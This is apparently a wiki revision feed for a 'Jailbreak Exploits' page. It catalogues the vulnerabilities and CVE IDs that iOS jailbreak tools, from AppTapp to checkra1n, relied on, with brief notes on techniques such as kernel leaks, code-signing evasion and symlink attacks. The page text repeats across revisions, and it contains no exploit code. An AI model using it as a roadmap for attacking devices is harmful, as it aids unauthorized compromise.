* unknown exploit ({{cve|2012-0643}})&lt;br /&gt;
&lt;br /&gt;
=== [[Corona|Corona Untether]] (5.0.1)  ===&lt;br /&gt;
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}})&lt;br /&gt;
* [[HFS Heap Overflow]] ({{cve|2012-0642}})&lt;br /&gt;
* unknown exploit ({{cve|2012-0643}})&lt;br /&gt;
&lt;br /&gt;
=== [[Absinthe|Absinthe 2.0]] and [[Rocky Racoon|Rocky Racoon Untether]] (5.1.1) ===&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* Racoon DNS4/WINS4 table buffer overflow ({{cve|2012-3727}})&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
&lt;br /&gt;
=== [[unthredeh4il]] (5.0-5.1.1) ===&lt;br /&gt;
Except for the [[iPad (3rd generation)]]&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* [[AMFID code signing evasion]] ({{cve|2013-0977}})&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 6.x ==&lt;br /&gt;
=== [[evasi0n]] (6.0 / 6.0.1 / 6.0.2 / 6.1 / 6.1.1 / 6.1.2)  ===&lt;br /&gt;
* [[Symbolic Link Vulnerability]] ({{cve|2013-0979}})&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
* [[Shebang Trick]] ({{cve|2013-5154}})&lt;br /&gt;
* [[AMFID code signing evasion]]&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[IOUSBDeviceFamily Vulnerability]] ({{cve|2013-0981}})&lt;br /&gt;
* [[ARM Exception Vector Info Leak]] ({{cve|2013-0978}})&lt;br /&gt;
* [[dynamic memmove() locating]]&lt;br /&gt;
* [[vm_map_copy_t corruption for arbitrary memory disclosure]]&lt;br /&gt;
* [[kernel memory write via ROP gadget]]&lt;br /&gt;
* [[Overlapping Segment Attack]] ({{cve|2013-0977}})&lt;br /&gt;
&lt;br /&gt;
=== [[p0sixspwn]] (6.1.3 / 6.1.4 / 6.1.5 / 6.1.6) ===&lt;br /&gt;
* [[posix_spawn kernel information leak]] ({{cve|2013-3954}}) (by [[i0n1c]])&lt;br /&gt;
* [[posix_spawn kernel exploit]] ({{cve|2013-3954}}) (by [[i0n1c]])&lt;br /&gt;
* [[mach_msg_ool_descriptor_ts for heap shaping]] ({{cve|2013-3953}})&lt;br /&gt;
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})&lt;br /&gt;
* [[DeveloperDiskImage race condition]] (by [[comex]])&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 7.x ==&lt;br /&gt;
=== [[evasi0n7]] (7.0 / 7.0.1 / 7.0.2 / 7.0.3 / 7.0.4 / 7.0.5 / 7.0.6) ===&lt;br /&gt;
{{Section Stub}}&lt;br /&gt;
* [[Symbolic Link Vulnerability]] ({{cve|2013-5133}})&lt;br /&gt;
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})&lt;br /&gt;
* CrashHouseKeeping chmod vulnerability ({{cve|2014-1272}})&lt;br /&gt;
* ptmx_get_ioctl ioctl crafted call ({{cve|2014-1278}})&lt;br /&gt;
&lt;br /&gt;
=== [[Geeksn0w]] (7.1 / 7.1.1) ===&lt;br /&gt;
* [[limera1n]]'s bootrom exploit ([[Tethered jailbreak]]) on [[iPhone 4]]&lt;br /&gt;
&lt;br /&gt;
=== [[Pangu]] (7.1 / 7.1.1 / 7.1.2) ===&lt;br /&gt;
* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) (Pangu v1.0.0)&lt;br /&gt;
* AppleKeyStore::initUserClient info leak ({{cve|2014-4407}}) (Pangu &amp;gt;v1.0.0)&lt;br /&gt;
* break_early_random (by [[i0n1c]] and Tarjei Mandt of Azimuth) ({{cve|2014-4422}})&lt;br /&gt;
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects&lt;br /&gt;
* IOSharedDataQueue notification port overwrite ({{cve|2014-4461}})&lt;br /&gt;
* &amp;quot;syslogd chown&amp;quot; vulnerability&lt;br /&gt;
* enterprise certificate (no real exploit, used for initial &amp;quot;unsigned&amp;quot; code execution)&lt;br /&gt;
* &amp;quot;foo_extracted&amp;quot; symlink vulnerability (used to write to /var) ({{cve|2014-4386}})&lt;br /&gt;
* /tmp/bigfile (a big file for improvement of the reliability of a race condition)&lt;br /&gt;
* VoIP backgrounding trick (used to auto restart the app)&lt;br /&gt;
* hidden segment attack&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 8.x ==&lt;br /&gt;
=== [[Pangu8]] (8.0 / 8.0.1 / 8.0.2 / 8.1) ===&lt;br /&gt;
* an exploit for a bug in /usr/libexec/neagent (source @iH8sn0w)&lt;br /&gt;
* enterprise certificate (inside the IPA)&lt;br /&gt;
* a kind of dylib injection into a system process (see IPA)&lt;br /&gt;
* a dmg mount command (looks like the Developer DMG) (syslog while jailbreaking)&lt;br /&gt;
* a sandboxing problem in debugserver ({{cve|2014-4457}})&lt;br /&gt;
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects&lt;br /&gt;
* the same kernel exploit as used in [[Pangu|the first Pangu]] ({{cve|2014-4461}}) (source @iH8sn0w) - now used to also leak kernel memory (source @Morpheus______)&lt;br /&gt;
* enable-dylibs-to-override-cache&lt;br /&gt;
* a new ovelapping segment attack ({{cve|2014-4455}})&lt;br /&gt;
&lt;br /&gt;
=== [[TaiG]] and [[PPJailbreak]] (8.0 / 8.0.1 / 8.0.2 / 8.1 / 8.1.1 / 8.1.2) ===&lt;br /&gt;
(See also details at [http://newosxbook.com/articles/TaiG.html newosxbook.com])&lt;br /&gt;
* A new AFC symlink attack ({{cve|2014-4480}}) - to get onto the device filesystem&lt;br /&gt;
* [[DeveloperDiskImage race condition]] (by [[comex]], also used in p0sixspwn) - to mount a fake DDI and instantly overwrite (via union) libmis/xpcd_cache&lt;br /&gt;
* A new overlapping segment attack [in a modified version], dyld, ({{cve|2014-4455}}) - negative LC_SEGMENT - to allow libmis and xpcdcache to load&lt;br /&gt;
* libmis redirection of MISValidateSignature (as per evasion) to kCFEqual, with overlapping segment variant on TaiG (Segment at end of file, negative)&lt;br /&gt;
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis/xpcd_cache)&lt;br /&gt;
* MobileStorageMounter exploit ({{cve|2015-1062}})&lt;br /&gt;
* Backup exploit used to access restricted parts of the filesystem ({{cve|2015-1087}})&lt;br /&gt;
&lt;br /&gt;
Kernel:&lt;br /&gt;
&lt;br /&gt;
* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) - leaks slid addresses&lt;br /&gt;
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects&lt;br /&gt;
* IOHIDFamily Kernel exploit ({{cve|2014-4487}}) - to overwrite memory&lt;br /&gt;
&lt;br /&gt;
=== [[TaiG]] and [[PPJailbreak]] (8.1.3 / 8.2 / 8.3 / 8.4) ===&lt;br /&gt;
(See also details at http://newosxbook.com/articles/28DaysLater.html and http://newosxbook.com/articles/HIDeAndSeek.html)&lt;br /&gt;
* [[DeveloperDiskImage race condition]] (also used in TaiG for 8.0-8.1.2 but modified) - to mount a fake DDI&lt;br /&gt;
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis)&lt;br /&gt;
* Symbolic linking to AFC ({{cve|2015-5746}})&lt;br /&gt;
* Backup exploit to write to protected regions of the disk ({{cve|2015-5752}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3802}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3803}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3805}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3806}})&lt;br /&gt;
* IOHIDFamily exploit ({{cve|2015-5774}})&lt;br /&gt;
* Air Traffic exploit to allow attackers to access arbitrary filesystem locations via vectors related to asset handling ({{cve|2015-5766}})&lt;br /&gt;
&lt;br /&gt;
=== [[EtasonJB]] and [[Home Depot]] (8.4.1) === &lt;br /&gt;
&lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* Kernel exploit ({{cve|2016-4656}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 9.x ==&lt;br /&gt;
=== [[Pangu9]] (9.0 / 9.0.1 / 9.0.2 / 9.1) ===&lt;br /&gt;
* Photos exploit to gain arbitrary unsandboxed file system access as mobile to load outdated DDI. ({{cve|2015-7037}})&lt;br /&gt;
* MobileStorageMounter allowed older DeveloperDiskImages to be mounted, resulting in unsandboxed unsigned code execution due to known weaknesses in entitled executables.  ({{cve|2015-7051}})&lt;br /&gt;
* IOHIDFamily Use-After-Free for kernel information leak / code execution as mobile. ({{cve|2015-6974}})&lt;br /&gt;
* dyld exploit in dyld shared cache handling to override MISValidateSignature in libmis.dylib for persistency ({{cve|2015-7079}})&lt;br /&gt;
* Racing KPP for some of the patches.&lt;br /&gt;
* AMFI MAC Hooks were in non-__const __DATA section, so wouldn't be integrity checked by KPP, allowing to replace MAC hooks required for code-signing. ({{cve|2015-7055}})&lt;br /&gt;
&lt;br /&gt;
=== [[Pangu9]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===&lt;br /&gt;
* IOMobileFrameBuffer exploit to execute arbitrary code with kernel privileges. ({{cve|2016-4654}})&lt;br /&gt;
&lt;br /&gt;
=== [[jbme]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===&lt;br /&gt;
* Webkit exploit ({{cve|2016-4657}})&lt;br /&gt;
&lt;br /&gt;
=== [[Home Depot]] (9.1-9.3.4) === &lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* Kernel exploit ({{cve|2016-4656}})&lt;br /&gt;
&lt;br /&gt;
=== [[JailbreakMe 4.0]] (9.1-9.3.4) === &lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* Kernel exploit ({{cve|2016-4656}})&lt;br /&gt;
* Webkit exploit ({{cve|2016-4657}})&lt;br /&gt;
&lt;br /&gt;
=== [[Phœnix]] (9.3.5 / 9.3.6) === &lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* mach_port_register Kernel exploit ({{cve|2016-4669}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 10.x ==&lt;br /&gt;
&lt;br /&gt;
=== [[extra_recipe+yaluX]] (10.0-10.1.1) ===&lt;br /&gt;
&lt;br /&gt;
* set_dp_control_port exploit to execute arbitrary code with kernel privileges. ({{cve|2016-7644}})&lt;br /&gt;
&lt;br /&gt;
=== [[yalu102]] (10.0.1-10.2) ===&lt;br /&gt;
&lt;br /&gt;
* mach_voucher_extract_attr_recipe_trap memory corruption. ({{cve|2017-2370}})&lt;br /&gt;
&lt;br /&gt;
=== [[doubleH3lix]] (10.0.1 - 10.3.3) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
=== [[Meridian]] (10.0 - 10.3.3) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
=== [[TotallyNotSpyware]] (10.0 - 10.3.3) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
* WebKit JIT optimization bug exploit ({{cve|2018-4233}})&lt;br /&gt;
&lt;br /&gt;
=== [[H3lix]] (10.0.1 - 10.3.4) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 11.x ==&lt;br /&gt;
&lt;br /&gt;
===[[Unc0ver]] (11.0-11.4.1)===&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.1.2 &lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.3.1&lt;br /&gt;
&lt;br /&gt;
* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})&lt;br /&gt;
* getvolattrlist (empty_list) ({{cve|2018-4243}})&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.4.1&lt;br /&gt;
&lt;br /&gt;
* voucher_swap ({{cve|2019-6225}}) &lt;br /&gt;
&lt;br /&gt;
===[[Electra]] (11.0-11.4.1)===&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.1.2&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
11.2 - 11.3.1&lt;br /&gt;
&lt;br /&gt;
* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})&lt;br /&gt;
* getvolattrlist (empty_list) ({{cve|2018-4243}})&lt;br /&gt;
&lt;br /&gt;
11.2 - 11.4.1&lt;br /&gt;
&lt;br /&gt;
* v1ntex ({{cve|2019-6225}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 12.x ==&lt;br /&gt;
&lt;br /&gt;
===[[Chimera]] (12.0 - 12.2 / 12.4)===&lt;br /&gt;
&lt;br /&gt;
12.0 - 12.1.2&lt;br /&gt;
&lt;br /&gt;
* voucher_swap ({{cve|2019-6225}}) &lt;br /&gt;
&lt;br /&gt;
12.0 - 12.2/12.4&lt;br /&gt;
&lt;br /&gt;
* SockPuppet ({{cve|2019-8605}})&lt;br /&gt;
&lt;br /&gt;
===[[Unc0ver]] (12.0 - 12.2 / 12.4 / 12.4.1)===&lt;br /&gt;
&lt;br /&gt;
12.0 - 12.1.2&lt;br /&gt;
&lt;br /&gt;
* voucher_swap ({{cve|2019-6225}}) &lt;br /&gt;
&lt;br /&gt;
12.0 - 12.2/12.4&lt;br /&gt;
&lt;br /&gt;
* SockPuppet ({{cve|2019-8605}})&lt;br /&gt;
&lt;br /&gt;
12.4.1&lt;br /&gt;
&lt;br /&gt;
* AppleAVE2Driver exploit ({{cve|2019-8795}})&lt;br /&gt;
* AppleSPUProfileDriver information leak ({{cve|2019-8794}})&lt;br /&gt;
&lt;br /&gt;
===[[checkra1n]] (12.3 - 12.4.7)===&lt;br /&gt;
&lt;br /&gt;
* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 13.x ==&lt;br /&gt;
&lt;br /&gt;
===[[Unc0ver]] (13.0 - 13.5)===&lt;br /&gt;
&lt;br /&gt;
* oob_timestamp ({{cve|2020-3837}})&lt;br /&gt;
* tachy0n (LightSpeed) ({{cve|2020-9859}})&lt;br /&gt;
&lt;br /&gt;
===[[checkra1n]] (13.0 - 13.5)===&lt;br /&gt;
&lt;br /&gt;
* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})&lt;/div&gt;</summary>
		<author><name>Inflatable Man</name></author>
		
	</entry>
	<entry>
		<id>https://www.theiphonewiki.com/w/index.php?title=Jailbreak_Exploits&amp;diff=106014</id>
		<title>Jailbreak Exploits</title>
		<link rel="alternate" type="text/html" href="https://www.theiphonewiki.com/w/index.php?title=Jailbreak_Exploits&amp;diff=106014"/>
		<updated>2020-07-23T00:00:21Z</updated>

		<summary type="html">&lt;p&gt;Inflatable Man: Corrected capitalization of SockPuppet and corrected its CVE ID.&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This page lists the '''exploits''' used in [[jailbreak]]s.&lt;br /&gt;
&lt;br /&gt;
== Common exploits ==&lt;br /&gt;
These exploits are not dependent on any firmware; as such, they are used in numerous jailbreaking programs.&lt;br /&gt;
&lt;br /&gt;
* [[Pwnage]] + [[Pwnage 2.0]] (together to jailbreak the [[M68AP|iPhone]], [[N45AP|iPod touch]], and [[N82AP|iPhone 3G]])&lt;br /&gt;
* [[ARM7 Go]] (from iOS 2.1.1) (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])&lt;br /&gt;
* [[0x24000 Segment Overflow]] (for [[untethered jailbreak]] on [[N88AP|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]] and [[N72AP|iPod touch (2nd generation)]] with [[Bootrom 240.4|old bootrom]]; another exploit as the [[limera1n Exploit]] is required)&lt;br /&gt;
* [[limera1n Exploit]] (for [[tethered jailbreak]] on [[N88AP|iPhone 3GS]], [[N18AP|iPod touch (3rd generation)]], [[K48AP|iPad]], [[iPhone 4]], [[N81AP|iPod touch (4th generation)]] and [[K66AP|Apple TV (2nd generation)]])&lt;br /&gt;
* [[usb_control_msg(0xA1, 1) Exploit]] (also known as &amp;quot;steaks4uce&amp;quot;) (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])&lt;br /&gt;
&lt;br /&gt;
== Jailbreak Programs ==&lt;br /&gt;
=== [[PwnageTool]] (2.0 - 5.1.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* uses the exploits listed below to untether up to iOS 5.1.1&lt;br /&gt;
&lt;br /&gt;
=== [[redsn0w]] (3.0 - 6.0) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* uses the same exploits as [[Absinthe|Absinthe]] and [[Absinthe|Absinthe 2.0]] to jailbreak iOS 5.0/5.0.1 and 5.1.1&lt;br /&gt;
* uses the exploits listed below to untether up to iOS 5.1.1&lt;br /&gt;
&lt;br /&gt;
=== [[sn0wbreeze]] (3.1.3 - 6.1.3) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* uses the exploits listed below to untether up to iOS 6.1.2&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 1.x ==&lt;br /&gt;
=== [[AppTapp Installer]] (1.0 / 1.0.1 / 1.0.2) ===&lt;br /&gt;
* iBoot &amp;lt;code&amp;gt;cp&amp;lt;/code&amp;gt;-command exploit&lt;br /&gt;
&lt;br /&gt;
=== [[iBrickr]] (1.0 / 1.0.1 / 1.0.2) ===&lt;br /&gt;
* iBoot &amp;lt;code&amp;gt;cp&amp;lt;/code&amp;gt;-command exploit&lt;br /&gt;
&lt;br /&gt;
=== [[AppSnapp]]/[[JailbreakMe|JailbreakMe 1.0]] (1.0 / 1.0.1 / 1.0.2 / 1.1.1) ===&lt;br /&gt;
* [[LibTiff|libtiff exploit]] (Adapted from the PSP scene, used by [[JailbreakMe]]) ({{cve|2006-3459}})&lt;br /&gt;
&lt;br /&gt;
=== [[mknod|OktoPrep]] (1.1.2) ===&lt;br /&gt;
&amp;quot;Upgrade&amp;quot; to 1.1.2 from a jailbroken 1.1.1&lt;br /&gt;
* [[mknod]]&lt;br /&gt;
&lt;br /&gt;
=== [[Soft Upgrade]] (1.1.3) ===&lt;br /&gt;
&amp;quot;Upgrade&amp;quot; to 1.1.3 from a running jailbroken 1.1.2&lt;br /&gt;
&lt;br /&gt;
=== [[ZiPhone]] (1.1.3 / 1.1.4 / 1.1.5) ===&lt;br /&gt;
* [[Ramdisk Hack]]&lt;br /&gt;
&lt;br /&gt;
=== [[iLiberty+|iLiberty / iLiberty+]] (1.1.3 / 1.1.4 / 1.1.5) ===&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 2.x ==&lt;br /&gt;
=== [[QuickPwn]] (2.0 - 2.2.1) ===&lt;br /&gt;
* uses [[Pwnage]] and [[Pwnage 2.0]]&lt;br /&gt;
&lt;br /&gt;
=== [[Redsn0w Lite]] (2.1.1) ===&lt;br /&gt;
* [[ARM7 Go]] (for [[N72AP|iPod touch (2nd generation)]] only)&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 3.x ==&lt;br /&gt;
=== [[purplera1n]] (3.0) ===&lt;br /&gt;
* [[iBoot Environment Variable Overflow]] ({{cve|2009-2795}})&lt;br /&gt;
* uses [[0x24000 Segment Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[blackra1n]] (3.1 / 3.1.1 / 3.1.2) ===&lt;br /&gt;
* [[usb_control_msg(0x21, 2) Exploit]] ({{cve|2010-0038}})&lt;br /&gt;
* uses [[0x24000 Segment Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[Spirit]] (3.1.2 / 3.1.3 / 3.2) ===&lt;br /&gt;
* [[MobileBackup Copy Exploit]]&lt;br /&gt;
* [[Incomplete Codesign Exploit]]&lt;br /&gt;
* [[BPF_STX Kernel Write Exploit]]&lt;br /&gt;
&lt;br /&gt;
=== [[Star|JailbreakMe 2.0 / Star]] (3.1.2 / 3.1.3 / 3.2 / 3.2.1) ===&lt;br /&gt;
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})&lt;br /&gt;
* [[Incomplete Codesign Exploit]]&lt;br /&gt;
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})&lt;br /&gt;
&lt;br /&gt;
=== [[limera1n]] / [[greenpois0n (jailbreak)|greenpois0n]] (3.2.2) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[Packet Filter Kernel Exploit]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 4.x ==&lt;br /&gt;
=== [[Star|JailbreakMe 2.0 / Star]] (4.0 / 4.0.1) ===&lt;br /&gt;
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})&lt;br /&gt;
* [[Incomplete Codesign Exploit]]&lt;br /&gt;
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})&lt;br /&gt;
&lt;br /&gt;
=== [[limera1n]] (4.0 / 4.0.1 / 4.0.2 / 4.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[Packet Filter Kernel Exploit]]&lt;br /&gt;
&lt;br /&gt;
=== [[greenpois0n (jailbreak)|greenpois0n]] (4.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[Packet Filter Kernel Exploit]]&lt;br /&gt;
&lt;br /&gt;
=== [[greenpois0n (jailbreak)|greenpois0n]] (4.2.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[HFS Legacy Volume Name Stack Buffer Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.2.6 / 4.2.7 / 4.2.8) ===&lt;br /&gt;
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})&lt;br /&gt;
* [[HFS Legacy Volume Name Stack Buffer Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[unthredeh4il]] (4.2.6 - 4.2.10) ===&lt;br /&gt;
Except for the [[iPad (3rd generation)]]&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* [[AMFID code signing evasion]] ({{cve|2013-0977}})&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.3 / 4.3.1 / 4.3.2 / 4.3.3) ===&lt;br /&gt;
Except for the [[N18AP|iPod touch (3rd generation)]] on iOS 4.3.1.&lt;br /&gt;
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})&lt;br /&gt;
* [[IOMobileFrameBuffer Privilege Escalation Exploit]] ({{cve|2011-0227}})&lt;br /&gt;
&lt;br /&gt;
=== i0nic's Untether (4.3.1 / 4.3.2 / 4.3.3) ===&lt;br /&gt;
used in [[redsn0w]] to untether iOS 4.3.1 / 4.3.2 / 4.3.3&lt;br /&gt;
* [[ndrv_setspec() Integer Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[unthredeh4il]] (4.3 - 4.3.5) ===&lt;br /&gt;
Except for the [[iPad (3rd generation)]]&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* [[AMFID code signing evasion]] ({{cve|2013-0977}})&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 5.x ==&lt;br /&gt;
&lt;br /&gt;
=== [[Absinthe]] (5.0 on [[N94AP|iPhone 4S]] only / 5.0.1 on [[iPad 2]] and [[iPhone 4S]])  ===&lt;br /&gt;
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}}) (used both for payload injection and untether)&lt;br /&gt;
* [[HFS Heap Overflow]] ({{cve|2012-0642}})&lt;br /&gt;
* unknown exploit ({{cve|2012-0643}})&lt;br /&gt;
&lt;br /&gt;
=== [[Corona|Corona Untether]] (5.0.1)  ===&lt;br /&gt;
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}})&lt;br /&gt;
* [[HFS Heap Overflow]] ({{cve|2012-0642}})&lt;br /&gt;
* unknown exploit ({{cve|2012-0643}})&lt;br /&gt;
&lt;br /&gt;
=== [[Absinthe|Absinthe 2.0]] and [[Rocky Racoon|Rocky Racoon Untether]] (5.1.1) ===&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* Racoon DNS4/WINS4 table buffer overflow ({{cve|2012-3727}})&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
&lt;br /&gt;
=== [[unthredeh4il]] (5.0-5.1.1) ===&lt;br /&gt;
Except for the [[iPad (3rd generation)]]&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* [[AMFID code signing evasion]] ({{cve|2013-0977}})&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 6.x ==&lt;br /&gt;
=== [[evasi0n]] (6.0 / 6.0.1 / 6.0.2 / 6.1 / 6.1.1 / 6.1.2)  ===&lt;br /&gt;
* [[Symbolic Link Vulnerability]] ({{cve|2013-0979}})&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
* [[Shebang Trick]] ({{cve|2013-5154}})&lt;br /&gt;
* [[AMFID code signing evasion]]&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[IOUSBDeviceFamily Vulnerability]] ({{cve|2013-0981}})&lt;br /&gt;
* [[ARM Exception Vector Info Leak]] ({{cve|2013-0978}})&lt;br /&gt;
* [[dynamic memmove() locating]]&lt;br /&gt;
* [[vm_map_copy_t corruption for arbitrary memory disclosure]]&lt;br /&gt;
* [[kernel memory write via ROP gadget]]&lt;br /&gt;
* [[Overlapping Segment Attack]] ({{cve|2013-0977}})&lt;br /&gt;
&lt;br /&gt;
=== [[p0sixspwn]] (6.1.3 / 6.1.4 / 6.1.5 / 6.1.6) ===&lt;br /&gt;
* [[posix_spawn kernel information leak]] ({{cve|2013-3954}}) (by [[i0n1c]])&lt;br /&gt;
* [[posix_spawn kernel exploit]] ({{cve|2013-3954}}) (by [[i0n1c]])&lt;br /&gt;
* [[mach_msg_ool_descriptor_ts for heap shaping]] ({{cve|2013-3953}})&lt;br /&gt;
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})&lt;br /&gt;
* [[DeveloperDiskImage race condition]] (by [[comex]])&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 7.x ==&lt;br /&gt;
=== [[evasi0n7]] (7.0 / 7.0.1 / 7.0.2 / 7.0.3 / 7.0.4 / 7.0.5 / 7.0.6) ===&lt;br /&gt;
{{Section Stub}}&lt;br /&gt;
* [[Symbolic Link Vulnerability]] ({{cve|2013-5133}})&lt;br /&gt;
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})&lt;br /&gt;
* CrashHouseKeeping chmod vulnerability ({{cve|2014-1272}})&lt;br /&gt;
* ptmx_get_ioctl ioctl crafted call ({{cve|2014-1278}})&lt;br /&gt;
&lt;br /&gt;
=== [[Geeksn0w]] (7.1 / 7.1.1) ===&lt;br /&gt;
* [[limera1n]]'s bootrom exploit ([[Tethered jailbreak]]) on [[iPhone 4]]&lt;br /&gt;
&lt;br /&gt;
=== [[Pangu]] (7.1 / 7.1.1 / 7.1.2) ===&lt;br /&gt;
* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) (Pangu v1.0.0)&lt;br /&gt;
* AppleKeyStore::initUserClient info leak ({{cve|2014-4407}}) (Pangu &amp;gt;v1.0.0)&lt;br /&gt;
* break_early_random (by [[i0n1c]] and Tarjei Mandt of Azimuth) ({{cve|2014-4422}})&lt;br /&gt;
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects&lt;br /&gt;
* IOSharedDataQueue notification port overwrite ({{cve|2014-4461}})&lt;br /&gt;
* &amp;quot;syslogd chown&amp;quot; vulnerability&lt;br /&gt;
* enterprise certificate (no real exploit, used for initial &amp;quot;unsigned&amp;quot; code execution)&lt;br /&gt;
* &amp;quot;foo_extracted&amp;quot; symlink vulnerability (used to write to /var) ({{cve|2014-4386}})&lt;br /&gt;
* /tmp/bigfile (a big file for improvement of the reliability of a race condition)&lt;br /&gt;
* VoIP backgrounding trick (used to auto restart the app)&lt;br /&gt;
* hidden segment attack&lt;br /&gt;
&lt;br /&gt;
